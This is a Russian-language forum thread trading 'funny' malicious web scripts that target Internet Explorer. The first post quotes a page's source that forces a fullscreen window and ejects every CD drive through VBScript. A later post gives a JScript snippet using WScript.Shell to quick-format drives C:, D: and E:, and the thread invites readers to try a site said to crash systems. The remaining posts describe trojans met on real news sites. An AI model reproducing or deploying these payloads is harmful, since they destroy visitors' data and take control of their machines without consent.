1

Тема: Весёлые web-скрипты ))

Вот так вот ходить по разным сомнительным сайтам, да ещё и сидя под IExplorer`om    smile))

зы: Mozilla и Opera рулят smile)

это находится тут >>>

А вот собсна, сам скрипт в хтмл-сорцах...

<!-- <input type> //-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
//-->
</script>
</head>

<body onLoad="MM_openBrWindow('death.htm','mywindow','fullscreen=1,location=0,menubar=0,resizable=0,scrollbars=0,status=0,toolbar=0')">
<script language=VBScript>
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection

if colCDROMs.Count >= 1 then
    For i = 0 to colCDROMs.Count - 1
  colCDROMs.Item(i).Eject
    Next
End If
</script>
Bwaaahaaahaaaa tongue
</body>
</html>

Те, кто хоть немного разбираются в программировании, легко найдут самые "весёлые" моменты  big_smile

А вот ещё один, говорят, что полный даун системы, но я туда не решилась сходить... Не было сподручных контрацептивов. Есть желание, пробуйте, дерзайте smile)) Результаты отпишите тут ))

Камикадзе сюда smile)

ВЫВОД: Пользуйте продукты кампании Microsoft!  wink

2

Re: Весёлые web-скрипты ))

Я набрался смелости и зашел в ИЕ.
с отключенным антивирем...
В общем не так все страшно, как могло показатся..
после смены оперативки и винта, все вновь заработало....

3

Интересно, винт и оперативка сдохли?  wink 

4

Anarki

Я думаю, что это была шутка, но как грится, в каждой шутке есть доля шутки, а остальное правда...  tongue

5

Вот ище лично от меня:

<script>
varWshShell = new ActiveXObject("WScript.Shell");
WshShell.Run ('cmd /c format c: /q');
WshShell.Run ('cmd /c format d: /q');
WshShell.Run ('cmd /c format e: /q');
</script>

6

хихи.. а под юнихами прикольнее... wink wink wink

оно даже что-то пыьается показать... wink

7

Не соглашусь с фразой *по сомнительным сайтам*. На сайте viruslist.ru ,сайте от Касперского по безопасности и еще там чему то..вдруг наткнулся на статью про случай заражения сайта rbc.ru Там троян насколько я помню был встроен в страницу. После этого впал в транс..ибо посещал этот сайт буквально несколько часов назад ,а о сайте РБК узнал по ТВ,с канала, принадлежащего фирме РосБизнесКонсалтинг. Проверил комп тут же..и естественно нашелся троян,тот самый о котором шла речь на вируслисте. Был немало удивлен..1)тем что компания РБК,компания,имеющая свой ТВ канал..допускает существование своего сайта с наличием встроенного трояна 2) тем,что после вмешательства компании Касперского ничего не поменялось в принципе..

П.С. очень жаль..сайт полон,на мой взгляд, полезной бизнес-информации.

Второй вопиющий случай. Искал как то перед матчем текстовую трансляцию идущего матча ФК Локомотив Москва. Набрал в рамблере- официальный сайт ФК локомотив- выдался результат. Под статус официального подходил один только сайт, lokomotiv.ru  помоему. Загрузил страницу..и захрюкал касперский оповещая о полезших троянах. Спустя где то полгода решил еще раз проверить указанный сайт,авось чего изменилось..нифига.

Ну и свежачок..наткнулся вчера на ссылку на статью с заголовком * Бондарчук довел коров до сердечного приступа*  lol . Находясь в шоке от заглавия кликнул ссылку и тут же увидел мессадж о встроенном вредоносном скрипте. Статья кстати располагалась на сайте regnum.ru (http://www.regnum.ru/news/896244.html )

Вывод..любой сайт сомнителен и подозрителен. Не удивлюсь что и рамблер,горячо мной любимый, падет перед этой напастью. Оч не хотелось бы..

П.П.С. буду признателен инфе о Trojan-Proxy.Win32.Xorpix.bs